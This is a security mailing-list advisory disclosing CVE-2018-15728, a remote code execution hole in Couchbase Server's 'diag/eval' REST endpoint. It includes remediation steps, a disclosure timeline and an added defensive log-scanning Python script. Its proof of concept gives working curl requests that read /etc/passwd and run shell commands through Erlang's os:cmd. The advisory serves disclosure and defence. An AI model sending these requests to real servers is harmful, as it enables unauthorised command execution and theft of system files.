List: bugtraq
Subject: Couchbase Server - Remote Code Execution
From: x ksi <s3810 () pjwstk ! edu ! pl>
Date: 2018-08-23 9:22:34
Message-ID: 732f7492-abda-4162-a896-7c686496a0a2 () journal ! report ! generator
Date: Thu, 23 Aug 2018 15:05:25 +1000
To: <fulldisclosure@seclists.org>, <bugtraq@securityfocus.com>
Hey,
Description:
Couchbase Server [1] exposes a REST API [2] which by default listens on
TCP/8091 (plain HTTP) and/or TCP/18091 (HTTPS).
Authenticated users can send arbitrary Erlang code to the 'diag/eval'
endpoint of that API. The code is evaluated inside the Couchbase Erlang
VM and can therefore call any Erlang function, including os:cmd/1, so it
runs in the underlying operating system with the privileges of the user
account Couchbase was started as. In practice, any credential that can
reach this endpoint is equivalent to a shell on the node.
The 'diag/eval' endpoint is referenced in the official documentation
[3][4][5]; however, the documentation does not contain any information
about the risks associated with allowing access to the endpoint in
question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether the 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below in order to verify if your
installation is affected or not.
Proof of Concept:
In both requests 'ABCD' stands for the base64-encoded 'user:password'
pair (curl's '-u user:password' produces the same header). The value of
the evaluated expression is returned in the HTTP response body.
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval \
   -X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
   binary_to_list(B) end.'
   (binary_to_list/1 converts the file contents to a printable string;
   binary_to_term/1 would raise badarg here because /etc/passwd is not
   in Erlang external term format.)
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval \
   -X POST -d 'os:cmd("env")'
   (os:cmd/1 runs the string through the system shell and returns its
   output; replace "env" with any command to confirm OS-level execution.)
Remediation:
Contact the vendor for remediation guidance. Until a fix is available,
restrict network access to the REST API (TCP/8091 and TCP/18091) to
administrative hosts only, and/or block the 'diag/eval' path at a
reverse proxy or firewall in front of the cluster. Treat every account
that can reach the REST API as having OS-level access to the node, and
monitor the HTTP access log for requests to 'diag/eval'.
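The following is an added example written for this page; it is not part of the original advisory and not Couchbase code. It shows the detection side of the remediation above: scanning a Couchbase-style HTTP access log for requests to the 'diag/eval' endpoint, separating successful POSTs (code actually ran) from failed probes (401) and from sources on an allow-list of known admin hosts. The log layout (Common Log Format) and the sample lines are assumptions constructed for the example; adapt LOG_RE to the exact format of your own http_access.log.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List

# Assumed layout: Common Log Format ("ip - user [ts] "METHOD path proto" status size").
# The real Couchbase access log may differ between versions; verify against your file.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not real traffic): one legitimate admin session from
# 10.0.0.5, two requests from an unexpected external address, one failed login,
# and a GET that the endpoint rejects with 405.
SAMPLE_LOG = """\
10.0.0.5 - Administrator [23/Aug/2018:09:22:34 +0000] "GET /pools/default HTTP/1.1" 200 1342
10.0.0.5 - Administrator [23/Aug/2018:09:22:40 +0000] "POST /diag/eval HTTP/1.1" 200 2048
203.0.113.7 - Administrator [23/Aug/2018:09:23:01 +0000] "POST /diag/eval HTTP/1.1" 200 17
203.0.113.7 - - [23/Aug/2018:09:23:05 +0000] "POST /diag/eval HTTP/1.1" 401 0
10.0.0.9 - monitor [23/Aug/2018:09:24:12 +0000] "GET /diag/eval HTTP/1.1" 405 0
"""

# Paths that give code execution to whoever can authenticate; extend as needed.
SENSITIVE_PATHS = ("/diag/eval",)


@dataclass(frozen=True)
class Hit:
    ip: str
    user: str
    ts: str
    method: str
    path: str
    status: int


def parse_line(line: str):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return Hit(
        ip=m.group("ip"),
        user=m.group("user"),
        ts=m.group("ts"),
        method=m.group("method"),
        path=m.group("path").split("?", 1)[0],  # ignore any query string
        status=int(m.group("status")),
    )


def find_diag_eval(lines: Iterable[str], allowed_sources=()) -> List[Hit]:
    """Every request to a sensitive endpoint, except from allow-listed admin hosts."""
    hits = []
    for line in lines:
        h = parse_line(line)
        if h is None:
            continue
        if h.path in SENSITIVE_PATHS and h.ip not in allowed_sources:
            hits.append(h)
    return hits


def successful_evals(hits: List[Hit]) -> List[Hit]:
    """Only 2xx POSTs actually evaluated code; 401/405 entries are probes."""
    return [h for h in hits if h.method == "POST" and 200 <= h.status < 300]


def summarize(hits: List[Hit]) -> Counter:
    """Count hits per (source ip, user) pair for triage."""
    return Counter((h.ip, h.user) for h in hits)


if __name__ == "__main__":
    all_hits = find_diag_eval(SAMPLE_LOG.splitlines())
    for h in successful_evals(all_hits):
        print(f"CODE EXECUTED: {h.ts} {h.ip} user={h.user} status={h.status}")
    for (ip, user), n in summarize(all_hits).items():
        print(f"{ip} ({user}): {n} request(s) to diag/eval")
```

Running the block as a script prints the two successful evaluations and a per-source count. In a real deployment, pass `allowed_sources` the addresses of your administration hosts so that only unexpected callers are raised as alerts.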
Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to security@couchbase.com.
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published an advisory about a similar vulnerability
found in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.
References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/
Thanks,
Filip Palian